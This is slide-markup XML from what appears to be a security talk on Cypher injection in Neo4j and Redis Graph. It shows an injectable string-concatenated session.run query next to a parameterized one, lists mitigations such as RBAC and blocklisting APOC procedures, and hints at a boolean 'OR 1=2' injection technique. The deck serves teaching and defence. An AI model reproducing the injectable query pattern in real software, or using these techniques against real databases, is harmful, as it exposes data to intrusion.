          <a:xfrm>
            <a:off x="1015800" y="1579175"/>
            <a:ext cx="8285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session.run("</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en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MATCH </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en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(c:Character) </a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2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1" i="0" lang="en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r>
              <a:rPr b="1" i="0" lang="en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2300" u="none" cap="none" strike="no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b="1" i="0" lang="en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i="0" lang="en" sz="2300" u="none" cap="none" strike="no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$name</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2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RETURN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en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c",</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2300" u="none" cap="none" strike="no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 {name: name})</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2300" u="none" cap="none" strike="noStrike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1" i="0" sz="2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5" name="Google Shape;369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54350" y="3681065"/>
            <a:ext cx="2589650" cy="14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6" name="Google Shape;3696;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="980450" y="2767825"/>
            <a:ext cx="8846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session.run("</a:t>
            </a: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MATCH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(c:Character) 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</a:t>
            </a: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i="0" lang="en" sz="2300" u="none" cap="none" strike="no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b="1" i="0" lang="en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' " + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2300" u="none" cap="none" strike="noStrike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+ " ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="21212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RETURN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en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c)</a:t>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="2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97" name="Google Shape;3697;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7561" l="6362" r="6352" t="7561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="132350" y="2767825"/>
            <a:ext cx="771900" cy="8559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98" name="Google Shape;3698;p43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6733" l="0" r="1399" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="56150" y="1703500"/>
            <a:ext cx="921000" cy="653400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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9" name="Google Shape;369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44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367050" y="1043950"/>
            <a:ext cx="7260000" cy="267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5" name="Google Shape;3705;p44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800"/>
              <a:t>Mitigations</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3706" name="Google Shape;3706;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379950" y="1039575"/>
            <a:ext cx="8502300" cy="22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➔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RBAC support - users, roles &amp; privileges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◆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Read / write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◆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Built-in granular roles - PUBLIC, reader, editor, publisher, … admin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7" name="Google Shape;3707;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379950" y="3394450"/>
            <a:ext cx="7671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➔"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en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Disable/blocklist Apoc procedures (neo4j.conf) (4.3)</a:t>
            </a:r>
            <a:endParaRPr b="1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8" name="Google Shape;3708;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7289" l="8937" r="19483" t="25707"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6859000" y="3969125"/>
            <a:ext cx="2192100" cy="1156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09" name="Google Shape;3709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0" name="Google Shape;3710;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352650" y="2522825"/>
            <a:ext cx="855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◆"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Revoke privileges from roles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◆"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Hardening capabilities per-user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4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45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1453675" y="1170125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6" name="Google Shape;3716;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877625" y="202625"/>
            <a:ext cx="7237200" cy="25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 word about </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="7300"/>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr sz="7300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3717" name="Google Shape;371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8" name="Google Shape;371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1600" y="2101501"/>
            <a:ext cx="3109625" cy="10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9" name="Google Shape;3719;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326600" y="1856800"/>
            <a:ext cx="55080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300"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="73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Graph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3" name="Shape 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Google Shape;3724;p46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1518925" y="1359300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5" name="Google Shape;3725;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501750" y="1200750"/>
            <a:ext cx="786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0" i="0" lang="en" sz="2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Parameterized queries are supported</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2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6" name="Google Shape;3726;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="3895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000"/>
              <a:t>Redis Graph</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3727" name="Google Shape;3727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8" name="Google Shape;3728;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969300" y="1723525"/>
            <a:ext cx="73590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Some procedures are supported (db.labels)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0" i="0" lang="en" sz="2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Substrings are supported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0" i="0" lang="e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CASE WHEN - if-based  (with OR 1=2)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9" name="Google Shape;3729;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4527900" y="4746550"/>
            <a:ext cx="426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https://redis.io/commands/graph.query/#procedures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0" name="Google Shape;3730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3600" y="943437"/>
            <a:ext cx="8751600" cy="3256625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4" name="Shape 3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5" name="Google Shape;3735;p47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="801725" y="1266225"/>
            <a:ext cx="6363900" cy="3078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Google Shape;3736;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="4657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000"/>
              <a:t>What Now</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3737" name="Google Shape;3737;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385175" y="783800"/>
            <a:ext cx="86880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en" sz="26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Understand</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> how Cypher injections work - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2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https://github.com/noypearl/cypher-playground</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600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8" name="Google Shape;3738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b="1" lang="en"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3739" name="Google Shape;3739;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390425" y="2667700"/>
            <a:ext cx="872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i="0" lang="en" sz="2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Bug bounty</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="e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hunt for bugs in Cypher </a:t>
            </a:r>
            <a:endParaRPr b="1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0" name="Google Shape;3740;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390425" y="2082700"/>
            <a:ext cx="8677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i="0" lang="en" sz="2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Fix</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="e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existing injections in your applications</a:t>
            </a:r>
            <a:endParaRPr b="1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1" name="Google Shape;3741;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390425" y="3252700"/>
            <a:ext cx="654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i="0" lang="en" sz="2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Reduce</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="en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attack surface</a:t>
            </a:r>
            <a:endParaRPr b="1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2" name="Google Shape;3742;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="390425" y="3759075"/>
            <a:ext cx="300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i="0" lang="en" sz="2600" u="none" cap="none" strike="noStrike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Profit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6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p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647100" y="1359300"/>
            <a:ext cx="8208300" cy="209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8" name="Google Shape;3748;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph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4000"/>
              <a:t>Resources &amp; Credits</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3749" name="Google Shape;3749;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="486200" y="1530425"/>
            <a:ext cx="8683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Cypher Injection Saga Writeup</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0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@Tempest Security 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●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en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https://github.com/morkin1792/CIWA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0" name="Google Shape;375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4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5" name="Google Shape;3755;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="12000"/>
          </a:blip>
          <a:srcRect b="22813" l="4225" r="27387" t="25677"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="90930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6" name="Google Shape;3756;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="5419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3757" name="Google Shape;3757;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679150" y="3790100"/>
            <a:ext cx="866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https://github.com/noypearl/cypher-playground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8" name="Google Shape;37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675" y="3923650"/>
            <a:ext cx="348475" cy="3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9" name="Google Shape;375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22363" y="1122925"/>
            <a:ext cx="2648324" cy="264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760" name="Google Shape;376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1" name="Google Shape;3761;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838650" y="4598550"/>
            <a:ext cx="3128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@noypearl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2" name="Google Shape;3762;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="20292" l="11179" r="12769" t="13663"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="633400" y="4591500"/>
            <a:ext cx="484850" cy="421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3" name="Google Shape;3763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650" y="4627787"/>
            <a:ext cx="348475" cy="3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4" name="Google Shape;3764;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="465775"/>
            <a:ext cx="7704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6000"/>
              <a:t>Try it yourself</a:t>
            </a:r>
            <a:endParaRPr sz="6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6" name="Shape 3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7" name="Google Shape;3187;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555500" y="1065425"/>
            <a:ext cx="7842000" cy="2191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8" name="Google Shape;3188;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88200" y="642800"/>
            <a:ext cx="89676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000"/>
              <a:t>What is Cypher?</a:t>
            </a:r>
            <a:endParaRPr sz="7000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3189" name="Google Shape;3189;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829650" y="2018125"/>
            <a:ext cx="75120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000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>(Open)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Cypher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> Query Language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4000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>in simple words</a:t>
            </a:r>
            <a:endParaRPr b="1"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0" name="Google Shape;319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4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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88200" y="1811475"/>
            <a:ext cx="89676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4500">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Cypher is commonly used in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6000"/>
              <a:t>Graph Databases</a:t>
            </a:r>
            <a:endParaRPr sz="6000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3196" name="Google Shape;319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0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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78600" y="8575"/>
            <a:ext cx="442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Relational Database</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3202" name="Google Shape;3202;p7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662975" y="1225800"/>
            <a:ext cx="1457700" cy="23625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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662975" y="1225800"/>
            <a:ext cx="1457700" cy="492900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5F819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</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662975" y="1693189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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662975" y="2160578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place_id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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662975" y="2627968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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662975" y="3095357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birth_date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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3051061">
            <a:off x="1105548" y="1824591"/>
            <a:ext cx="235444" cy="230036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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436977" y="1650315"/>
            <a:ext cx="1457700" cy="1895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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436977" y="1650315"/>
            <a:ext cx="1457700" cy="492900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5F8195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1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</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436977" y="2117704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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436977" y="2585093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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436977" y="3052482"/>
            <a:ext cx="1457700" cy="4929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city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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3051061">
            <a:off x="2879550" y="2249106"/>
            <a:ext cx="235444" cy="230036"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="11698" w="11973">
                <a:moveTo>
                  <a:pt x="8928" y="1750"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9192" y="1750"/>
                  <a:pt x="9452" y="1852"/>
                  <a:pt x="9641" y="2057"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10050" y="2435"/>
                  <a:pt x="10050" y="3096"/>
                  <a:pt x="9641" y="3506"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9452" y="3695"/>
                  <a:pt x="9192" y="3790"/>
                  <a:pt x="8928" y="3790"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8664" y="3790"/>
                  <a:pt x="8396" y="3695"/>
                  <a:pt x="8192" y="3506"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7814" y="3096"/>
                  <a:pt x="7814" y="2435"/>
                  <a:pt x="8192" y="2057"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8396" y="1852"/>
                  <a:pt x="8664" y="1750"/>
                  <a:pt x="8928" y="1750"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7901" y="1"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6958" y="1"/>
                  <a:pt x="6010" y="363"/>
                  <a:pt x="5293" y="1080"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4285" y="2088"/>
                  <a:pt x="3939" y="3569"/>
                  <a:pt x="4380" y="4924"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="126" y="9177"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="9240"/>
                  <a:pt x="0" y="9334"/>
                  <a:pt x="0" y="9397"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="11319"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="11540"/>
                  <a:pt x="158" y="11697"/>
                  <a:pt x="347" y="11697"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2300" y="11697"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2363" y="11697"/>
                  <a:pt x="2489" y="11634"/>
                  <a:pt x="2521" y="11571"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2993" y="11099"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3088" y="11004"/>
                  <a:pt x="3119" y="10910"/>
                  <a:pt x="3088" y="10815"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2993" y="10311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3718" y="10217"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3876" y="10217"/>
                  <a:pt x="3970" y="10091"/>
                  <a:pt x="4033" y="9902"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4096" y="9208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4600" y="9271"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4695" y="9271"/>
                  <a:pt x="4821" y="9271"/>
                  <a:pt x="4884" y="9208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4978" y="9114"/>
                  <a:pt x="5010" y="9051"/>
                  <a:pt x="5010" y="8956"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5010" y="8326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5640" y="8326"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5703" y="8326"/>
                  <a:pt x="5829" y="8295"/>
                  <a:pt x="5860" y="8232"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6742" y="7350"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7131" y="7479"/>
                  <a:pt x="7533" y="7543"/>
                  <a:pt x="7931" y="7543"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8891" y="7543"/>
                  <a:pt x="9833" y="7171"/>
                  <a:pt x="10523" y="6436"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11972" y="4987"/>
                  <a:pt x="11972" y="2592"/>
                  <a:pt x="10523" y="1143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9823" y="379"/>
                  <a:pt x="8865" y="1"/>
                  <a:pt x="79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Google Shape;3215;p7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2134988" y="2296426"/>
            <a:ext cx="287674" cy="245849"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="1848" w="2439">
                <a:moveTo>
                  <a:pt x="1580" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1371" y="203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="1068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1371" y="1645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580" y="1847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2439" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15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6" name="Google Shape;3216;p7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1305100"/>
            <a:ext cx="0" cy="3082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3217" name="Google Shape;32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7100" y="2462748"/>
            <a:ext cx="1525575" cy="1525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8" name="Google Shape;321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78200" y="1076500"/>
            <a:ext cx="1634675" cy="1634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9" name="Google Shape;3219;p7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6241425" y="2296775"/>
            <a:ext cx="1273500" cy="51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20" name="Google Shape;3220;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1390570">
            <a:off x="6142280" y="2045745"/>
            <a:ext cx="1409443" cy="5541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Lives at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1" name="Google Shape;3221;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4638000" y="14925"/>
            <a:ext cx="442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000"/>
              <a:t>Graph Database</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3222" name="Google Shape;3222;p7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577962" y="4314050"/>
            <a:ext cx="3424800" cy="809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3" name="Google Shape;3223;p7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix amt="88000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="749161" y="4385937"/>
            <a:ext cx="1297707" cy="67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4" name="Google Shape;3224;p7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="30498" l="33798" r="36549" t="10315"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123423" y="4346958"/>
            <a:ext cx="714165" cy="74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61971" y="4346952"/>
            <a:ext cx="910643" cy="748446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Google Shape;3226;p7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106250" y="4314050"/>
            <a:ext cx="3425700" cy="809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7" name="Google Shape;322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54523" y="4470315"/>
            <a:ext cx="629370" cy="582743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3228" name="Google Shape;3228;p7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4711325" y="2383963"/>
            <a:ext cx="1543200" cy="1543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baseline="3000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9" name="Google Shape;3229;p7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7522200" y="1091763"/>
            <a:ext cx="1543200" cy="15432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baseline="3000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0" name="Google Shape;3230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55978" y="4529605"/>
            <a:ext cx="1192251" cy="44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1" name="Google Shape;3231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213198" y="4416713"/>
            <a:ext cx="1192255" cy="689958"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
